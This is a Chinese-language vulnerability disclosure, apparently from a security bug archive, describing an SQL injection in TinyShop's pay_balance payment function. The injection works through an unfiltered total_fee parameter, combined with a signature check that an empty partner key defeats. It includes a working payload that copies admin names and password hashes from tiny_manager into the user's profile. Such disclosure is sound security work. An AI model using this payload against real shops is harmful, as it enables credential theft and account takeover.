TinyShop SQL注入一枚

### 简要描述： 20140926 ### 详细说明： 因为是支付，会查询订单状态，要先创建一个订单。 /protected/controllers/payment.php中 pay_balance函数 total_fee变量 ``` //余额支付方式，服务器端处理 public function pay_balance(){ $sign = Req::post('sign');//从post中获取sign $args = Req::post(); unset($args['sign']); $total_fee = Req::post('total_fee');//直接从post获取 $attach = Filter::int(Req::post('attach')); $return['attach'] = Req::post('attach'); $return['total_fee'] = floatval(Req::post('total_fee')); $return['order_no'] = Req::post('order_no'); $return['return_url'] = Req::post('return_url'); 。。。 if(floatval($return['total_fee']) < 0 || $return['order_no'] == '' || $return['return_url'] == '') { $msg = array('type'=>'fail','msg'=>'支付参数不正确！'); $this->redirect('/index/msg',false,$msg); } else{//订单正常的话，就开始支付了 $payment = new Payment($attach);//attach为孔的时候，$payment也会为空 $paymentInfo = $payment->getPayment();//paymentInfo为空 $pay_balance = new pay_balance(); $filter_param = $pay_balance->filterParam($args); //对待签名参数数组排序 $para_sort = $pay_balance->argSort($filter_param); $mysign = $pay_balance->buildSign($para_sort,$paymentInfo['partner_key']);//最后$paymentInfo['partner_key']也为空，所以无所谓数据库里key是什么了，直接不用他 if($mysign == $sign) //sign是post过来的，绕过 { $user_id = $this->user['id']; $model = new Model("customer"); $customer = $model->where("user_id=".$user_id)->find(); if($customer['balance']>=$total_fee){ $order = $model->table("order")->where("order_no='".Filter::sql($return['order_no'])."' and user_id=".$user_id)->find(); if($order){ if($order['pay_status']==0){ $flag = $model->table("customer")->where("user_id=".$user_id)->data(array('balance'=>"`balance`-".$total_fee))->update(); //total_fee进入查询 $return['order_status'] = 'TINY_SECCESS'; 。。。。 ``` ``` public function buildSign($sort_para,$key,$sign_type = "MD5") { //把数组所有元素，按照“参数=参数值”的模式用“&”字符拼接成字符串 $prestr = $this->createLinkstring($sort_para); //把拼接后的字符串再与安全校验码直接连接起来 $prestr = $prestr.$key; //key为空 $mysgin = md5($prestr); return $mysgin; } ``` key也无效了，不具体跟了，我们做一个代理，帮我们生成sign就好。 ### 漏洞证明： url=http%3A%2f%2f127.0.0.1%2findex.php%3Fcon%3Dpayment%26act%3Dpay_balance order_no=20141108134136569665&return_url=111&total_fee=12.00 , `real_name`=(SELECT concat(name,0x5f,password) from tiny_manager) [<img src="https://images.seebug.org/upload/201411/081344147814e835ae4b7416dbe0dde698cdb209.png" alt="QQ截图20141108134331.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/081344147814e835ae4b7416dbe0dde698cdb209.png) 404是因为return_url=111 [<img src="https://images.seebug.org/upload/201411/08134425ffc52e91dc77b716c522b89de40b7a96.png" alt="QQ截图20141108134358.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/08134425ffc52e91dc77b716c522b89de40b7a96.png) 更新到了个人资料里